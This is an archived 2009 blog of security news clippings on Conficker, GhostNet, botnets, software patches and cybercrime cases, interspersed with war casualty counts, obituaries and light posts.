Saturday, March 28, 2009

U.S. Toll in Iraq, Afghanistan

Iraq And Afghanistan statistics via The Boston Globe (AP).

As of Saturday, March 28, 2009, at least 4,262 members of the U.S. military had died in the Iraq war since it began in March 2003, according to an Associated Press count.

The figure includes eight military civilians killed in action. At least 3,425 military personnel died as a result of hostile action, according to the military's numbers.

The AP count is one fewer than the Defense Department's tally, last updated Friday at 10 a.m. EDT.

As of Saturday, March 28, 2009, at least 599 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures Friday at 10 a.m. EDT.

Of those, the military reports 442 were killed by hostile action.

More here and here.

And as always, the Iraq Coalition Casualty Count keeps the grim watch on their website here.

Honor the Fallen.

30 Year Anniversary of The Three Mile Island Accident

Three Mile Island Nuclear facility

Thirty years ago today...

- ferg

Israeli Company Uses Botnet to Attack Hezbollah Website

Oded Yaron writes on Ha'aretz:

Last week, while trying out breaking-in tools developed by Chinese hackers, an Israeli Network security company, Applicure, brought down the Hezbollah Web site (, using no more than 10 bots, which are computers controlled by hackers.

Reports of hackers taking out Web sites by bombarding them with massive amounts of information commonly appear in the news media. But often it's hard to estimate both the magnitude of the phenomenon and the ease with which even laymen can use existing web tools.

Those attacks geared at bringing down Web sites are know as either denial of service attacks (DOS) or distributed denial of service attacks (DDoS), and make use of Botnet networks - large networks of unsuspecting computer users hijacked by hackers with viruses and Trojan horses. According to Chinese CERT (Computer Emergency Response Team), the threat on China's internal network has multiplied by 20 in 2007.

More here.

Hat-tip: The Dark Visitor

ICANN Continues Collaborative Response to Conficker Worm

Via The ICANN Blog.

The Conficker worm that has infected hosts across the Internet continues to evolve. At this point, we do not believe cause exists for general alarm, but the Internet community must continue to take action against Conficker. ICANN continues to engage in collaborative efforts with security researchers, software & anti-virus vendors and with registries and registrars throughout the DNS community to disseminate information about how the malicious code may seek to leverage the DNS system.

The initial variants of the worm, Conficker A/B, focused on potentially utilizing a limited number of domain names to control the infected computers. The affected registrars have collaborated to block the control of this variant of the worm over the past two months. A new variant, Conficker C, has been identified. This variant is more complex and presents increased mitigation challenges. Among these challenges, Conficker C seeks to use a wider range of domain names across the DNS, involving many more names in across a greater number of registries. Analysis indicates the Conficker C code will become active on April 1st. ICANN is working with the security, vendor and DNS communities in an effort to proactively inform those involved registries who might be affected with specific information that will enable them to block the use of the DNS to control the infected computers. Through the outreach, the registry community is now in close contact with the Conficker working group and taking actions appropriate to their particular situations. An important note regarding April 1st : While the Conficker C code may become active on this date, the DNS and the Internet will likely not see a sudden wave of disruption or activity from the infected computers. Lack of activity on April 1st does not mean the millions of infected computers have been cleaned up or that efforts to mitigate the control of these computers can stop.

The cooperation to stop the spread of the Conficker worm and block control of the infected computers has become a major effort involving well over 100 organizations. The collaborative has conducted shared technical analysis and passed information resulting in practical, proactive steps to limit control and stop the spread of the worm. ICANN will continue its efforts with the security and DNS communities and sees this effort as a model for effective global response to situations that challenge the security and stability of the Internet and the DNS. We also want to encourage individuals and organizations who are concerned about removing the malicious code and to contribute to disabling Conficker to visit for information regarding what can be done.


'Act Locally, Pwn Globally'

Jeffrey Carr writes on SecurityFocus:

We need to change the game. We need an international effort to mandate verification of registration information for all Internet services and products. Even ICANN has been too lax in its verification procedures, according to a 2005 U.S. General Accountability Office study which found that eight percent of all domains had at least one instance of obviously false WHOIS information.

Moving up from ICANN, we need to hold large hosting companies responsible for criminal behavior on their leased sites. In other words, enforce their terms-of-service agreement. lists the top ten infected network blocks responsible for the world's badware. SoftLayer Technologies comes in at number seven with 3,507 infected sites, followed by The Planet, another Plano, TX company, at number eight with 3,166 infected sites.

Finally, we need a commitment from governments to provide no safe harbors for cyber criminals and cooperate in international investigations. One way to start the process would be to form a world body solely for the purpose of building the cooperative networks needed to initiate and complete international network forensic investigations.

More here.

Vast Electronic Spy System Loots Computers in 103 Countries

John Markoff writes in The New York Times:

A vast electronic spying operation has infiltrated computers and has stolen documents from hundreds of government and private offices around the world, including those of the Dalai Lama, Canadian researchers have concluded.

In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.

The researchers, who are based at the Munk Center for International Studies at the University of Toronto, had been asked by the office of the Dalai Lama, the exiled Tibetan leader whom China regularly denounces, to examine its computers for signs of malicious software, or malware.

Their sleuthing opened a window into a broader operation that, in less than two years, has infiltrated at least 1,295 computers in 103 countries, including many belonging to embassies, foreign ministries and other government offices, as well as the Dalai Lama’s Tibetan exile centers in India, Brussels, London and New York.

The researchers, who have a record of detecting computer espionage, said they believed that in addition to the spying on the Dalai Lama, the system, which they called GhostNet, was focused on the governments of South Asian and Southeast Asian countries.

More here.

Friday, March 27, 2009

NOVA: Extreme Ice

If you missed this NOVA special episode, you can catch it all online here.

This should really scare the shit out of you -- climate change is real, and is accelerating at rates that most people cannot imagine, and do not know about.

Word to the wise... this is real. And this will change everything.

- ferg

Indian Army Fears China Attack by 2017

Via The Daily Times (Pakistan).

The Indian military fears a ‘Chinese aggression’ in less than a decade, the Hindustan Times has reported, and claimed that a secret exercise – called ‘Divine Matrix’ – by the army’s military operations directorate has visualised a war scenario with the nuclear-armed neighbour before 2017.

“A misadventure by China is very much within the realm of possibility with Beijing trying to position itself as the only power in the region. There will be no nuclear warfare but a short, swift war that could have menacing consequences for India,” said an army officer, who was part of the three-day war games that ended on Wednesday. In the military’s assessment, based on a six-month study of various scenarios before the war games, “China would rely on information warfare (IW) to bring India down on its knees before launching an offensive”, the report claimed.

The war games saw generals raising concerns about the IW battalions of the People’s Liberation Army (PLA) carrying out hacker attacks for military espionage, intelligence collection, paralysing communication systems, compromising airport security, inflicting damage on the banking system and disabling power grids. “We need to spend more on developing information warfare capability,” he said. The war games dispelled the notion that China would take at least one year for a substantial military build-up across India’s northeastern frontiers. “The Tibetan infrastructure has been improved considerably. “The PLA can now launch an assault very quickly, without any warning,” said the officer.

More here.

Hat-tip: InfoSec News

Friday Monkey Blogging: Monkey Kills Task-Master Owner - With a Well-Aimed Coconut

As I mentioned a few months ago, I started a regularly recurring blog entry meme every Friday afternoon, inspired by Bruce Schneier's regular series of "Friday Squid Blogging" posts, and my very own maddening Monkey Theory.

Here is this week's installment.

Andrew Drummond writes on the Daily Mail:

A monkey who tired of being forced to climb trees to pick coconuts killed his owner with a well-aimed coconut.

The owner died immediately from the monkey's throw from the top of a tree in the Thai Province of Nakorn Sri Thammarat, according to the Samui Express newspaper.

The newspaper said that Leilit Janchoom, 48, had beaten the monkey whenever he showed any hesitance to climb a tree.

The owner was insistent because he got the equivalent of 4p for every coconut picked.

But the monkey - it is claimed - apparently found the work boring, strenuous and unrewarding.

More here.

Image source: Daily Mail

Firefox 3.0.8 Released

Fixed in Firefox 3.0.8:

MFSA 2009-13 Arbitrary code execution through XUL element
MFSA 2009-12 XSL Transformation vulnerability

Get it.

- ferg

In Passing: Irving R. Levine

Irving R. Levine
August 26, 1922 - March 27, 2009

Fears of a Conficker Meltdown Greatly Exaggerated

Robert McMillan writes on PC World:

Worries that the notorious Conficker worm will somehow rise up and devastate the Internet on April 1 are misplaced, security experts said Friday.

Conficker is thought to have infected more than 10 million PCs worldwide, and researchers estimate that several million of these machines remain infected. If the criminals who created the network wanted to, they could use this network to launch a very powerful distributed denial of service (DDoS) attack against other computers on the Internet.

April 1 is the day that the worm is set to change the way it updates itself, moving to a system that is much harder to combat, but most security experts say that this will have little effect on most computer users' lives.

That hype will probably intensify when the U.S. TV newsmagazine 60 Minutes airs a report Sunday on Conficker, entitled "The Internet is Infected."

More here.

UK: Houses of Parliament Computers Infected with Conficker Virus

Matthew Moore writes on The Telegraph:

The Houses of Parliament IT system has become infected with the Conficker computer virus, it has emerged, raising questions about possible security flaws at the Palace of Westminster.

The worm virus, which has affected more than 15 million computers around the world, has become established on computers used by MPs, Lords and parliamentary staff.

Known variously as Conficker, Downadup, and Kido, it buries itself deep inside a PC's Windows operating system, from where it can be used by hackers to steal users' passwords and personal information.

Although it is not clear when or how the machines became infected, there were claims last night that parliament had failed to follow standard online security procedures.

An email sent to parliamentary staff alerting them to the infection – seen by Channel 4 News – warned employees to stop running unauthorised machines on the network, indicating that this had previously been allowed. Most large firms only allow secured computers to plug in to their networks.

More here.

Thursday, March 26, 2009

Firefox Fix Due Next Week After Attack Is Published

Robert McMillan writes on PC World:

Online attack code has been released targeting a critical, unpatched flaw in the Firefox browser.

The attack code, written by security researcher Guido Landi was published on several security sites Wednesday, sending Firefox developers scrambling to patch the issue. Until the flaw is patched, this code could be modified by attackers and used to sneak unauthorized software onto a Firefox user's machine.

Mozilla developers have already worked out a fix for the vulnerability. It's slated to ship in the upcoming 3.0.8 release of the browser, which developers are now characterizing as a "high-priority firedrill security update," thanks to the attack code. That update is expected sometime early next week.

"We... consider this a critical issue," said Mozilla Director of Security Engineering Lucas Adamski in an email.

The bug affects Firefox on all operating systems, including Mac OS and Linux, according to Mozilla developer notes on the issue.

More here.

Wednesday, March 25, 2009

Mark Fiore: Leverage Me Tender

More Mark Fiore brilliance.

Via The San Francisco Chronicle.

Connecting-the-dots: Hopping Mad!

- ferg

The Fourth Front: Russia's Cyber-Attack on Georgia

David J. Smith writes on Georgian Daily:

According to Tkeshelashvili, “DDoS attacks began in the weeks before the Russian invasion and continued even after the Kremlin announced that it had ceased hostilities.” The attacks blocked Internet communications, crippled Georgian government fileservers, defaced websites, established counterfeit sites and degraded telephonic communications, she said.

Private analysts add that fraudulent transaction attempts overwhelmed Georgian bank computers, spurring foreign commercial institutions to cut links with Georgia in self-defense.

Of course, one of the advantages of cyber-war is that it is hard to trace. But no one believes that a gaggle of Indonesian teenagers or Colombian narcotraficantes struck Georgia through the Ethernet just as Russian tanks prepared to strike through the Roki Tunnel.

Moreover, the attack was too well coordinated to come from Russian “hacktivists” alone, although many such individual malefactors took their cues from certain malicious Russian sites.

More here.

'Mafiaboy' to Headline IT 360

Michael Calce, a.k.a. "Mafiaboy"

Jennifer Kavur writes on IT World Canada:

As a 15-year-old, he brought down some of the highest profile sites on the Web. Eight months of detention and eight years of silence later, Michael Calce discusses what the good guys can learn from the black hats.

The infamous 15-year-old hacker who successfully launched a series of denial-of-service attacks in early 2000 that brought down Yahoo, Amazon, eBay and CNN, among others, is coming to Toronto next month.

The attacks, which took the FBI and RCMP two months to trace back to the Montreal high school student, led Michael “Mafiaboy” Calce to plead guilty to 55 counts of mischief, serve eight months juvenile detention and remain silent for eight years.

Calce, now a 23-year-old security consultant, agreed to his first media interview last fall. This coincided with the release of his book, Mafiaboy: How I Cracked the Internet and Why It's Still Broken, which Calce co-authored with journalist Craig Silverman.

But the former hacker hasn't stopped attracting controversy.

More here.

Java Runtime Environment 6.0 Update 13

Via the SANS Internet Storm Center.

JRE 6.0 Update 13 has been released and addresses a couple of security issues. You can see the release notes for this version here. If you have a business case for remaining on the older JRE 5.0 version, Update 18 for it has been released as well. You can see the release notes for it here.

Both of these updates address various security issues.


Get it.

- ferg

U.S. Senator Asks DHS for Cyber Security Documents

Stephanie Condon writes on C|Net News:

The top Republican on the Senate Homeland Security Committee is requesting detailed information, including financial figures, from the U.S. Department of Homeland Security to explain why the department has been seemingly unable to fulfill its cybersecurity responsibilities.

In a letter sent to DHS Secretary Janet Napolitano on Tuesday, Sen. Susan Collins (R-Maine) said that in light of the recent resignation of National Cybersecurity Center Director Rod Beckström, she would like DHS to send the Homeland Security Committee a number of documents to show how the department spent its $6 million NCSC budget and provided other means of support for the NCSC.

In a resignation letter turned in earlier this month, Beckström said, "the NCSC did not receive appropriate support inside DHS during the last administration to fully realize (its) vital role."

Collins said in her letter to Napolitano that she was very concerned by Beckström's assertion, especially given the authority the NCSC has been granted.

More here.

SCADA Watch: FERC Seeks to Close Cyber-Security 'Gaps' at Nuclear Plants

Jacob Goodwin writes on Government Security News:

The Federal Energy Regulatory Commission wants to ensure that when new security regulations related to nuclear power plants come into effect, no security “gap” is created that would leave portions of the nuclear plants unprotected from cyber-attacks.

To that end, the FERC issued a “clarification” on March 25 that indicated that those portions of a nuclear power plant that were specifically exempted from tighter security procedures in the forthcoming regulations from the Nuclear Regulatory Commission (NRC), are nonetheless still required to adhere to what are known as Critical Infrastructure Protection (CIP) Reliability Standards.

“Thus, to assure that there is no ‘gap’ in the regulatory process, the [FERC] clarifies that the ‘balance of plant’ equipment within a nuclear power plant in the United States that is not regulated by the NRC is subject to compliance with the CIP Reliability Standards,” said FERC, in a notice published in the Federal Register.

More here.

Researcher to Blow Lid Off 'Secure' Retail Networks

Danny Bradbury writes on InfoSecurity US:

Next month, a security researcher will unveil a hack that he says could provide backdoor access into thousands of US networks. Rob Havelt, practice manager for the Spider Labs penetration testing laboratory within security firm Trustwave, will demonstrate how to hack into the frequency hopping spread spectrum (FHSS) networks that underpin everything from barcode scanning systems in retail through to some mobile IP phones.

Havelt, who will reveal more information at Blackhat Europe in mid April, said that the FHSS networks commonly employed by systems such as Motorola's Symbol product range have commonly been perceived as secure.

"FHSS used to be seen as a security mechanism as well as a way for these things to talk to each other, because it channel hops across the spectrum, so it never lingers on a single channel for a few milliseconds," he said. "Consequently, a lot of organizations that deployed FHSS networks don't follow the same security practices as they do with other wireless networks."

Frequency hopping isn't entirely random, he warned. The hop pattern, along with information such as the system ID, is broadcast in advance from the network access point in the form of beacon frames, which can be sniffed over the network.

More here.

UK e-Crime Fight Hindered by Lack of Cash

Jeremy Kirk writes on TechWorld:

A new UK police force dedicated to tracking down cybercriminals is gearing up to make the most of what one senior police official acknowledges is limited funding.

The Police Central e-crime Unit, due to begin operations soon, came to be as part a comprehensive overview of how the UK handles fraud and e-crime after years of criticism that the government wasn't doing enough.

The unit will receive £7 million ($10 million) in funding over the next three years from the Home Office and Metropolitan Police.

"This is not a lot of money," said Janet Williams, deputy assistant commissioner in the Specialist Crime Directorate of the Metropolitan Police Service, during a presentation at the E-crime Congress in London on Wednesday.

Overall, the strategy for dealing with e-crime will be increased training for law enforcement, linking different law enforcement agencies and allying with private industry.

Of the 43 police forces in England and Wales, "only a handful of high-tech investigators" are in those jurisdictions, William said. Additionally, it's likely that specific computer forensics equipment would have to be shared between jurisdictions.

More here.

Security Fears Cutting Into E-Commerce Biz

Matt Hines writes on the eWeek "Security Watch" Blog:

Experts have been saying for years that the influx of online malware attacks and related identity theft would eventually have a negative impact on consumers' willingness to shop over the Web, but a new research report issued by Javelin Strategy & Research has actually put some numbers behind the theory.

In fact, according to the Javelin survey of U.S. consumers, e-commerce vendors may have lost as much as $21 billion in online sales during 2008 based primarily on information security concerns. The company interviewed roughly 2,000 people over the phone and online during Dec. 2008 to reach its conclusions.

Unsurprisingly, those individuals who had already been victimized by identity thieves or other cyber-criminals were among the most likely to have abandoned e-commerce sites, with 12 percent of those respondents indicating that they no longer shop online at all, and another 25 percent telling Javelin that they have at least cut back on their purchases. Some 19 percent of the affected respondents said that they spend less money when shopping as a result of their experiences.

Of all those surveyed, 40 percent replied that they will only shop at major brand sites, such as, based on fears of ID theft.

Despite the negative findings, which also included the fact that some 45 percent of e-shoppers were dissatisfied with some element of the online buying experience, the report also concludes that e-commerce companies can incent buyers to view their services more positively if they can assure that personal information is processed safely (83 percent) and offer enhanced security measures (80 percent). Another concept popular with shoppers was the willingness of sites to offer zero liability against ID theft for their customers (81 percent).

More here.

Ex-British Spy Advocates Greater Access to Personal Data

A Reuters newswire article, via eWeek, reports that:

Security at the G20 summit next week will rest in part on Britain's pervasive closed circuit cameras, but in the future pre-emptive surveillance could extend to the entire country's personal data.

That is the vision outlined by former security chief David Omand in a study of intelligence methods seen by privacy campaigners as a plan for a vast breach of human rights.

"Finding out other people's secrets is going to involve breaking everyday moral rules," he said in the paper for the Institute of Public Policy Research, an influential think tank.

"Application of modern data mining and processing techniques does involve examination of the innocent as well as the suspect to identify patterns of interest for further investigation."

In an interview, Omand said: "If you have the advantage of pre-emptive intelligence, then you are able to use the rapier, not the bludgeon, of state power."

More here.

Panda Releases Free Security Tool for Autorun

Erik Larkin writes on the PC World "Security Alert" Blog:

Panda, an antivirus software company, has a new free Panda USB Vaccine available for download that can disable the Windows Autorun feature for an entire PC or a particular USB drive.

The Autorun feature in Windows can make it easier to install software - and it can also be exploited by malware like the Conficker worm, which co-opts the feature to spread itself. I've previously written about the risk, and turning off Autorun can be a good idea for better computer security.

To download this small tool you'll have to first give Panda your e-mail address and opt-out of receiving marketing e-mails (unless you want them), but it's a quick download after that and doesn't require installation. When you run it, you can click a button to vaccinate your computer (disabling Autorun), and you can then click the button again to turn Autorun back on.

More here.

Cisco Releases Multiple Security Advisories for IOS Vulnerabilities


Cisco has released multiple security advisories to address vulnerabilities in IOS Software. These vulnerabilities may allow an attacker to cause a denial-of-service condition, interfere with network traffic, or operate with escalated privileges.

US-CERT encourages users and administrators to review the following Cisco security advisories and apply any necessary workarounds or updates to help mitigate the risks.


Tuesday, March 24, 2009

'The Analyzer' Hack Probe Widens - $10 Million Allegedly Stolen From U.S. Banks

Ehud Tenenbaum in 1998.

Kim Zetter writes on Threat Level:

Ehud Tenenbaum, an Israeli hacker arrested in Canada last year for allegedly stealing about $1.5 million from Canadian banks, also allegedly hacked two U.S. banks, a credit and debit card distribution company and a payment processor in what U.S. authorities are calling a global "cashout" conspiracy.

The U.S. hacks have resulted in at least $10 million in losses, according to court records obtained by Threat Level, and are just part of a larger international conspiracy to hack financial institutions in the United States and abroad.

The broadened case highlights the continued vulnerability of U.S. financial networks to cybercrime, despite supposedly tight industry security standards. It comes on the heels of other multimillion-dollar heists that also breached the security protecting ATM codes and account information. In late 2007, criminals used four hacked iWire payroll cards to steal $5 million from ATMs around the world in just two days. Shortly thereafter, a processing server that handles withdrawals from Citibank-branded ATMs at 7-Eleven convenience stores was cracked, leading crooks to converge on New York to withdraw at least $2 million from Citibank accounts using the stolen ATM data. And a carefully coordinated global heist last November resulted in a one-day haul of $9 million in cash, following a breach at payment processor RBS WorldPay.

Tenenbaum, 29, made headlines a decade ago under his hacker handle "The Analyzer" for penetrating Pentagon computers and other networks. He'd been living in France, and had only been in Canada about five months on a six-month visitor's permit when he was arrested last August in Calgary with three alleged accomplices for allegedly hacking into Direct Cash Management, a Calgary company that distributes prepaid debit and credit cards. A Canadian court granted him CDN $30,000 bail, but before he could be released from jail, U.S. authorities swooped in with a provisional warrant to retain him in custody while they pursued an indictment and extradition.

More here.

Image source: Gary Warner

China Becoming the World's Malware Factory

Robert McMillan writes on PC World:

With China's economy cooling down, some of the country's IT professionals are turning to cybercrime, according to a Beijing-based security expert.

Speaking at the CanSecWest security conference last week, Wei Zhao, CEO of Knownsec, a Beijing security company, said that while many Chinese workers may be feeling hard times, business is still booming in the country's cybercrime industry. "As the stock market dropped like a stone, a lot of IT professionals lost lots of money on the stock market," he said. "So sometimes they sell 0days," he said, referring to previously unknown software bugs.

"China is not only the world's factory, but also the world's malware factory," Zhao said.

China's red-hot economy has been hit by the global recession, and while the economy is still growing, technology companies such as Intel, Motorola and Lenovo have all laid off employees in China in recent months.

Last December, Chinese hackers found a previously undisclosed 0day vulnerability in Internet Explorer. When employees of Zhao's company inadvertently published details of the bug on a public forum, Microsoft was sent scrambling to patch the issue.

More here.

Canadian Police: Criminals Love The BlackBerry's Wiretap-Proof Ways


Wireless messages sent on a BlackBerry are so hard to intercept that the smartphones have become the device of choice for both criminals and law enforcement, police say.

While some police admit that level of security makes the BlackBerry their preferred handheld device, they also say that also makes it hard for them to listen in on suspected criminals.

"It does limit our abilities to intercept, which in turn minimizes our abilities to prevent the crimes," said Supt. Pat Fogerty of the Combined Forces Special Enforcement Unit of British Columbia, a division of the Royal Canadian Mounted Police.

The problem is that BlackBerry smartphones, designed by Waterloo, Ont.-based Research In Motion initially for corporate clients, run software called the BlackBerry Enterprise Server that creates a secure and private network and encrypts data.

Police say criminals are using additional layers of encryption with other types of software, bringing the encryption level up to military grade.

More here.

German Police: Two-factor Authentication Failing

Jeremy Kirk writes on PC World:

A two-factor authentication system widely used in Germany is failing to stop cybercriminals from draining bank accounts, a top German law enforcement official said Tuesday.

As of last year, about 95 percent of German online banking patrons were using "iTan" codes, random secret numbers that are requested of a bank customer during an online transaction, said Mirko Manske, detective chief superintendent for Germany's Federal Criminal Police Office.

The iTan code is used as an additional measure of authentication besides the customer's login information. The iTan code can only be used once and is intended to thwart online banking attacks where an attacker has all the other customer information.

But "it does not work," said Manske during a presentation at the E-crime Congress in London. "We are still losing money."

The problem is that hackers have figured out ways to execute transactions in real time, utilizing the iTan code and making the security control essentially useless.

More here.

Monday, March 23, 2009

Australia: Hacked Filter Reveals Blacklist in 30 Seconds

Brett Winterford writes on

A 30-second hack of a NetAlert-approved family-friendly filter exposes a list of websites banned in Australia.

The vulnerability, leaked to iTnews over the weekend and verified by IT security consultants, is due to a flaw in the Integard internet filtering software developed by Brisbane's Race River Corporation.

A source claimed to iTnews that Integard can be reverse-engineered with a hex editor to reveal material the software is designed to keep secret.

iTnews asked three IT security specialists for their opinions.

They all refused to go on the record but they said the list of banned URLs is exposed in a process that takes about 30 seconds.

More here.

Creative Spammers

Click for larger image.

I found this in my GMail spam-box tonight.

Luckily, GMail already knew about it, and classified it as spam, but admittedly this is a new one on me -- I've never seen this sort of graphic spam exercise before.

Sure, I've seen a lot of them, but not this particular method.


- ferg

New Zealand: TelstraClear Hires Teen Bot Master

Owen Walker

Michael Field writes on The Age:

TelstraClear, Telstra's New Zealand subsidiary, has hired one of the worlds best known hackers - a teenager known as "Akill".

Nineteen-year-old Owen Thor Walker became the subject of a US Federal Bureau of Investigation (FBI) cyber crime investigation spanning the United States, Europe and New Zealand and dubbed "Bot Roast".

New Zealand police finally caught him last year and he admitted to being the ring-leader, code-named Akill, of a group known as the A-Team.

Starting as a 16-year-old at school, Mr Walker designed and planted "botnets" which are a network of hacked computers able to be controlled via the internet by a single computer.

He came up with a system that beat anti-virus software, it spread automatically and it destroyed rival bot codes.

His botnet reached at least 1.3 million computers.

He pleaded guilty to six cyber crime charges but when he ended up in the High Court in Hamilton Justice Potter did not convict him but ordered him to pay a share in damage caused to hacked computers and to stay off computers.

More here.

Image source: The Age / Iain McGregor / Waikato Times

Space Storm Alert: 90 Seconds From Catastrophe

Michael Brooks writes on New Scientist:

It is midnight on 22 September 2012 and the skies above Manhattan are filled with a flickering curtain of colourful light. Few New Yorkers have seen the aurora this far south but their fascination is short-lived. Within a few seconds, electric bulbs dim and flicker, then become unusually bright for a fleeting moment. Then all the lights in the state go out. Within 90 seconds, the entire eastern half of the US is without power.

A year later and millions of Americans are dead and the nation's infrastructure lies in tatters. The World Bank declares America a developing nation. Europe, Scandinavia, China and Japan are also struggling to recover from the same fateful event - a violent storm, 150 million kilometres away on the surface of the sun.

It sounds ridiculous. Surely the sun couldn't create so profound a disaster on Earth. Yet an extraordinary report funded by NASA and issued by the US National Academy of Sciences (NAS) in January this year claims it could do just that.

Over the last few decades, western civilisations have busily sown the seeds of their own destruction. Our modern way of life, with its reliance on technology, has unwittingly exposed us to an extraordinary danger: plasma balls spewed from the surface of the sun could wipe out our power grids, with catastrophic consequences.

More here.

Hacked Web Pages Hauls Estimated at $10,000 a Day

Shaun Nichols writes on

The recent wave of search engine optimised web attacks is netting a huge cash haul for hackers and malware vendors, according to researchers.

Security firm Finjan claimed that a single hacker can make as much as $10,800 (£7,400) a day by embedding compromised web pages with links to attack sites and lists of popular search terms.

Finjan chief technology officer Yuval Ben-Itzhak said that the company recently observed a single attack operation involving a set of compromised pages that redirected to a site pushing a rogue anti-virus program.

The attackers had compromised a series of pages which were then embedded with lists of popular search terms collected from services such as Google Trends or current news items. The same pages were then injected with obfuscated code that redirected to the attack page, which used fake alert boxes to convince the user to download and purchase the bogus security software for $50 (£34).

Over a period of 16 days, Finjan recorded some 1.8 million hits from the infected pages. Between seven and 12 per cent of the victims actually downloaded and installed the software, and roughly 1.79 per cent paid the $50 fee.

More here.

Psybot: Botnet Based on Home Network Routers

Via H-Online.

DroneBL a distributed DNS Blacklist service, says in a recent blog post that a botnet named Psybot gained control of approximately one hundred thousand routers and that it became a victim of a distributed denial-of-service (DDoS) attack that was carried out by this botnet.

A botnet consisting primarily of routers is actually rather unusual. Usually Windows PCs are enslaved to act like zombies in a botnet. Psybot seems to have specialised in attacking small home network routers that run an embedded Linux for MIPS CPUs.

According to a description [.pdf] by Terry Baume, the Netcomm NB5 is one of the main targets. Baume says that for older versions of the DSL modem with router functionality, the web interface and an SSH port were directly accessible from the internet, access didn't even require a password. While this problem was later solved with a firmware update, it is questionable whether this update was installed on all the routers.

More here.

Security Fix: Web Fraud 2.0 - Data Search Tools for ID Thieves

Brian Krebs writes on Security Fix:

Data such as your Social Security number, mother's maiden name and credit card balance are not as difficult for ID thieves to find as most people think. I've recently learned that cyber crooks are providing cheap, instant access to detailed consumer databases, offering identity thieves the ability to find missing data as they compile dossiers on targeted individuals.

Security Fix spent the past week testing services offered by two Web sites that sell access to a wealth of information on consumers. Each site offers free registration, but requires users to fund their accounts via Webmoney, a PayPal-like virtual currency that is popular in Russia and Eastern Europe.

I enlisted the help of a half-dozen volunteers who agreed to let me try to find their personal and financial data on these sites. For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.

More here.

Sunday, March 22, 2009

Classic xkcd: No Pun Intended

Click for larger image.

We love xkcd.


- ferg

Australia: iiNet Pulls Out of Internet Filter Trials

Mitchell Bingemann writes on Australian IT:

iiNet has pulled out of the federal Government's Internet filtering trials.

iiNet only agreed to participate in the trial to demonstrate that the filter was flawed and a waste of taxpayers’ money, iiNet managing director Michael Malone said.

Mr Malone cited drawn-out negotiations with the Department of Broadband, Communications and the Digital Economy (DBCDE), constant changes in policy, and last week’s leak of a secret Internet blacklist as reasons for pulling out.

"It became increasingly clear that the trial was not simply about restricting child pornography or other such illegal material, but a much wider range of issues including what the Government simply describes as ‘unwanted material’ without an explanation of what that includes," Mr Malone said.

iiNet's withdrawal from the ISP filter trials is another blow for the controversial project. Last week the federal Government's plans for the nationwide internet filter were put in jeopardy when its top-secret blacklist of banned web pages was leaked.

The list is currently being used as the backbone of the Government's Internet filter trial of which phase one is being conducted by Primus Telecommunications, Tech 2U, Webshield, OMNIconnect, Netforce and Highway 1.

More here.

In Passing: Jade Goody

Jade Goody
5 June 1981 – 22 March 2009

Quote of The Day: William S. Lind

"Airstrikes serve as one of the most effective recruiting tools of America's opponents in Afghanistan, both because of the civilians killed and because when you attack someone from an invulnerable position -- that is to say, an altitude of 20,000 feet above the ground -- you make him want to fight you all the more."

- William S. Lind, writing in a commentary piece for UPI.